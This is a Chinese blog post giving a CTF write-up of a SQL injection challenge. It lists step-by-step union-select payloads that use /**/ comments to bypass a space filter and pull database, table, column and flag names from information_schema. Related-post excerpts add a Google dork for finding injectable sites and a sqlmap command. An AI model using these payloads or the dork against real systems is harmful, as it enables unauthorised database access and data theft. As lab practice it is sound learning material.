简单的sql注入之2 / writeup (手工注入,纯属练手)

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量1.9k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wewww111/article/details/81571245
版权

多测试几次可以发现,空格被注释了,百度解决方法,用/**/代替空格的位置,

构造语句1'/**/or/**/'1'='1 确认为单引号注入

用order by 确认select字段数,以确定union的字段数

可得,只有一个字段

获取数据库 

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/#

获取数据库web1的所有表名 

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/#

看到flag表,获取字段名

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where table_name='flag'/**/#

获取flag

1'/**/union/**/select/**/flag/**/from/**/flag/**/#

 

wewww111
关注
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6689
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_36352432的博客
12-23 357
靶场地址:封神台方法一、首先尝试手工注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 1834
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库中的一个表schemata表中的一个字段(列),这个字段中记录着所有数据库的名称information_schema数据库中的一个表tables表中的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表中的一个字段(相应数据库中所对应的表名),记录着与table_schema这个字段对应的数据库中对应的表名。
sql注入、cookie注入练手网站
深海蓝的技术随笔
07-16 8914
google搜索关键词:inurl: asp?id=
实验吧——(web)简单SQL注入1、2 writeup
qq_39480875的博客
05-22 536
判断注入类型 输入:1 输入:1’ 出现报错,初步猜测这是一个字符型的注入。 尝试一些基本的语句: 输入: 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤 测试了几个关键词以后,发现都被过滤了 关键词被过滤:解决方法如下 1大小写交替: Ord...
实验吧-简单sql注入3 Writeup
baynk的博客
07-29 371
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
【PTE】承制科技培训SQL注入题目writeup
HkD01L的博客
11-22 822
承制科技的pte培训课程提供的靶场,sql注入题目writeup
封神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 859
今天给大家带来封神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 582
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 657
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
实验吧 ctf 题目简单sql注入2writeup
ZweLL032的博客
03-11 6292
解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1  python sqlmap.py  -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent  --tampe
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 3626
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
fakebook writeup sql注入思路
weixin_45253216的博客
01-20 335
2021.1.20 网鼎杯的一道题。 习惯性拿到题目先扫目录 发现了robots.txt。 看到了/user.php.bak这个,应该是源码泄漏。 bak文件可以下载到本地,bak是back-up 备份文件,需要改为对应文件名才能打开,这里就把user.php.bak,改为user.php即可。 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; publi
sql注入手工注入的一般套路
qq_25987491的博客
04-14 2208
这道题不是考工具使用,我们要练习手工注入……. 题目:简单sql注入之3 地址:http://www.shiyanbar.com/ctf/1909 没有手工注入的小伙伴们看看了,跟着daoskc的思路一起学习下。 本文的手工的暴力猜解都由BurpSuite完成 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错...
软件测试之记一次简单sql注入,java项目为什么不能产生sql注入安全问题
blingbling*的博客
12-03 269
前提:项目后端使用java语言 问题:前端传入特殊字符串为什么不能引起sql注入安全问题? 研究过程: 如果按照所有文章中说的这样: String sql= "select * from user_table where username="+username+"and password="+password; 输入:"or 1=1-- 则结果就会是:String sql= "select * from user_table where username=""or 1=1--and password="";
一个简单的登陆案例模拟sql注入及Statement与PreparedStatement对比
浅时光|初如梦
06-15 581
1. sql注入 由于后台的sql是拼接而来,其中的参数是用户提交的,如果用户在提交参数时,参杂了一些sql的关键字或者特殊符号,可能会导致sql语义的改变,从而造成一些意外的操作。 2.Statement Statement主要用于执行静态sql语句,即内容固定不变的sql语句 Statement没执行一次都要对传入的sql语句编译一次,效率较差 某些情况下,sql语句只是其中的参数有所不同,其余子句完全相同,不适用于Statement 会被sql注入攻击 模拟sql 注入的代码实现如下:
简单sql注入之一 (实验吧)
wewww111的博客
08-11 3814
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
SQL注入漏洞分析:Web渗透解决方案
"web渗透writeup - 漏洞分析与利用" 这篇描述涉及的是一个Web应用程序中的SQL注入漏洞利用,以及如何通过PHP代码逻辑来获取flag。问题的关键在于一个PHP脚本,它处理用户登录并执行SQL查询来验证用户身份。在分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值